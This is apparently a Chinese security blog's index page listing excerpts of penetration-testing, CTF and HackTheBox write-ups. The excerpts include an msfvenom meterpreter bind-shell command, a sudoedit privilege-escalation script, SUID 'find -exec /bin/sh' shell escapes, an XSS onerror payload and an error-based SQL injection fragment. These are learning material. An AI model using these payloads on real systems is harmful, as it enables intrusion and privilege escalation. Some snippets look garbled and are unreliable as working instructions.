
web安全
nini_boom
很简单,做top of top。
安全不是IT服务的附属,是主人。IT服务依赖的是人,而安全威胁的不是软件、系统而是人、集团甚至是国家的数据。
展开
-
子域名劫持漏洞详解、挖掘和防护
总之,你挖掘漏洞的方法越奇特,详尽,你所能挖到的东西也就越多。一、理解子域名劫持漏洞这个分标题只为了回答一个问题:子域名劫持是怎么形成的、怎么理解它?一个域名对应着一个提供服务的服务器IP,如何对应起来的?很简单,DNS解析,是DNS让域名和IP进行对应的。同样的,子域名对应着一个IP,或者是对应着另外一个域名。对应这张图,主要解释下几个过程。递归解析。一次性完成全部名字到地址的转换。比如baidu.com直接解析到8.8.8.8,不需要经过其他步骤来处理。反复解析。每次请求一个服务器,请.原创 2020-08-30 19:15:40 · 2814 阅读 · 0 评论 -
SRC资产收集
资产搜集到位了,才能挖到别人挖不到的漏洞浪子表哥的工具:Langzi_eyes兄弟域名JSFinderOneForAll七麦数据,查询同一家公司下所属APP。app信息搜集spysexserver的使用原创 2020-08-19 15:40:50 · 1069 阅读 · 2 评论 -
从任意文件下载漏洞到拿下多台内网服务器权限
文章涉密部分,会进行大量打码,敬请谅解一、从一个任意文件下载漏洞说起客户内网系统中有一个系统上线前例行安全检测。我接到单子之后开始整活~ 打开系统,首先看看有没有上传点,兴冲冲找了一圈,失望而归。不过好歹有一个文件下载的地方,抓个包看看情况。看到fileUrl后跟的地址,觉得有比较大的可能存在任意文件读取,于是碰一碰运气。果其不然,这里可以读取到服务器任意的文件。按照道理来说,这时我应该再挖一个低危交差。但是想到前段时间公司大神分享的案例,觉得这个漏洞还有得玩,于是从这个点开始深入。二.原创 2020-07-01 21:17:14 · 1170 阅读 · 0 评论 -
CVE-2020-0796复现
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python原创 2020-06-09 11:04:34 · 407 阅读 · 0 评论 -
红蓝演习对抗之溯源篇
分享工作之外有用的事情。一、流量监测流量中发现有IP持续在对公司资产进行攻击。初步判断是有人使用扫描器在对公司资产进行攻击。二、溯源信息为了能找到更多攻击者的信息,首选是拿下攻击者的服务器。我听取了大神的建议,使用goby进行初步的扫描,不用不知道,一用吓一跳。这里吹一波goby,基于go内核,速度和效率有保证,UI优雅,采用 Electron+VUE 前端框架,跨平台,从扫描到打漏洞库,乃至生成报告,一条龙服务了。哈哈哈,废话少说,看结果。不到5s,结果出来了,很明显,这里存在.原创 2020-06-05 22:37:32 · 3632 阅读 · 2 评论 -
sudo的一种提权方式
cd /tmpcat > sudoedit << _EOF#!/bin/shecho ALEX-ALEXsu/bin/su/user/bin/su_EOFchmod a+x ./sudoeditsudo ./sudoedit输入你当前的用户密码即可完成提权原创 2019-11-05 16:46:54 · 782 阅读 · 0 评论 -
小记SUID -find提权
find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;如果有find执行touch testfind . -exec /bin/sh ; -quit这时候,你就拥有...原创 2019-11-01 16:20:47 · 2275 阅读 · 0 评论 -
Pumpkin Garden 靶场实战
靶场是实战的演习,通过靶场能学习很多东西,这样下次遇到类似的问题,就知道该怎么做了。此次的靶场,我独立完成了60~70%,剩下的因为自己的粗心和知识面问题,导致错失100%完成度。好了,废话不多说,我会在过程中详细说明自己的思路。一、信息收集nmap扫描我平时使用的最多的是这条nmap命令:nmap -sV -sC -A -Pn -oN ip.txt ip但是这次的靶场,我只扫出了...原创 2019-10-31 17:24:30 · 678 阅读 · 0 评论 -
命令注入绕过小结
学到的东西,拎出来,总结总结,分享出来,才是完整的学习过程我觉得。一、命令注入官方的解释:即 Command Injection。是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。记得师傅用一句话概括注入的本质:就是把非法的输入当做代码来执行了。二、绕过.号被过滤,无法执行反弹目标机器的IP(例:192.168.1.1)时,将IP转成十进制进行绕过。(172....原创 2019-10-30 11:21:14 · 1000 阅读 · 0 评论 -
一次Billu_b0x渗透学习
一次Billu_b0x渗透学习这次的Billu_b0x靶场应该说是学习经验,按照大神的流程走了一遍,中间各种扫盲,和学习思路,现在把整体的思路和过程梳理一下。一、发现IP虚拟机打开,按照规则所说,NAT模式,没有发现IP于是ifconfig,找到vmnet8的C段,这里就是虚拟机存在的网段。nmap -sP 172.16.230.1/24nmap -sP 是扫描这个C段对pin...原创 2019-10-16 15:42:31 · 1438 阅读 · 1 评论 -
一种类型的mysql报错注入
积跬步,以至千里一、起因在src挖掘的时候,发现了这种head头注入注入点是在X-Forwarded-Host中直接报出了用户id为11用户的密码程序报错。二、疑问为什么这样就会报错?floor(rand(0)*2))x from information_schema.tables group by x)a)and'我知道updatexml报错,是因为没有找到更新xml...原创 2019-09-15 15:25:55 · 222 阅读 · 0 评论 -
记一次xss绕过
积累从点滴做起在上传文件的地方,所有的文件必须要有以下抬头,那么这就说明直接上传小马是不现实的了。我fuzz了一下,在地址处填入,发现大小写、编码、双写那我就不适用<--<img src=` onerror=alert(658)> --!><img src=` onerror=alert(658)> --!>这里的`被单独转出来了,出发o...原创 2019-09-05 14:12:16 · 226 阅读 · 0 评论 -
信息收集篇(1)
听大佬说过一次又一次关于信息收集的重要性,但是自己在实操的时候,总是有些迷茫。于是就有了这篇文章,将信息收集的步骤和工具列出来,方便以后实操时按照此流程走下去,慢慢地养成科学、高效的信息收集习惯我理解的信息收集内容:资产认证+子域名+子域名的子域名+旁站+C段+网页蜘蛛爬虫+指纹识别+github信息泄露+内容敏感信息泄露(google语法)一、资产认证这是我自己创造的词,什么叫资产认证...原创 2019-08-28 15:01:33 · 507 阅读 · 0 评论 -
CTF之懵懂时期系列---后台登录
自己发现一种创新的攻击方式不适于现在的学习成长。现在最主要的任务是:多见各种题型、动手实践、总结思路、记录思路下的具体步骤。总之就是,做的广、记得多。目前绝不提倡创新。参考资料:http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/在实验吧这样这道题:http://ctf5.shiyanbar.com/web/houtai...原创 2019-03-27 19:25:44 · 1533 阅读 · 0 评论 -
CTF之懵懂时期系列---因缺思汀的绕过
题目链接:http://ctf5.shiyanbar.com/web/pcat/index.php这道题严格来说,我只解了一半,考点在于源码分析、group by with rollup、关键字绕过.这一篇的文章和之前ctf系列的不一样,之前的都是学习,反推别人的思路,这次以自己的思路为博客的主线。一、发现源码右键查看网页源代码(ctf是否有意培养我们这样的习惯?)source....原创 2019-04-07 17:45:44 · 503 阅读 · 0 评论 -
hack the box lame渗透过程
hack the box就不多介绍了。直接上题1、信息收集端口扫描nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3参数作用-Pn如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作-sV检查服务端的软件版本,可针对不同版本选择payload-sC...原创 2019-05-12 10:41:16 · 1830 阅读 · 0 评论 -
hack the box Popcorn
进入hack的世界不能自拔1、信息收集nmap -sV -sC -A -Pn -oN 10.10.10.6.txt 10.10.10.62、尝试msf启动,apache httpd2.2.12尝试了一波payload,但是都没有达到理想的结果。于是想扫描下10.10.10.6的网页目录我使用的是macOS,不知道用啥扫描工具比较好。好吧,Dirbuster和我之前想用的工具...原创 2019-06-02 17:20:38 · 684 阅读 · 1 评论 -
mysql注入---DNSLOG注入
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。0x01 DNSLOG注入当我们遇到了盲注、延时注入时,页面没有具体的返回。但是盲注、延时注入需要进行大...原创 2019-07-21 18:09:16 · 596 阅读 · 0 评论 -
学习首次渗透过程以及总结
谈不上思路,就只是工具和流程直接堆。一、准备工具1、工具NessusAWVSAppscanburpsuitesqlmapHydra2、字典github上的,已经关注。在线定制pydictorsomd5 提供的字典二、信息搜集不知道具体做什么,就是我现在的情况。但是渗透测试和开发不一样,有明显的突破口和方向,但是要忙起来,怎么忙?就照这个流程走吧!信息收集这个...原创 2019-08-27 17:38:26 · 531 阅读 · 0 评论 -
CTF之懵懂时期系列---文件上传
在实验吧遇到的题目:http://ctf5.shiyanbar.com/web/upload/直说主题,这道题我不会,我是看了其他人的博客才知道是怎么回事。先说过程,然后提问题,再释疑,最后总结提炼。一、过程界面如上所示,查看网页源代码:这里有个隐藏的表单,路径是/uploads/我们试下上传一个.php脚本,结果那上传jpg格式的文件总可以了吧,然后上传php说要j...原创 2019-04-04 13:40:06 · 1268 阅读 · 0 评论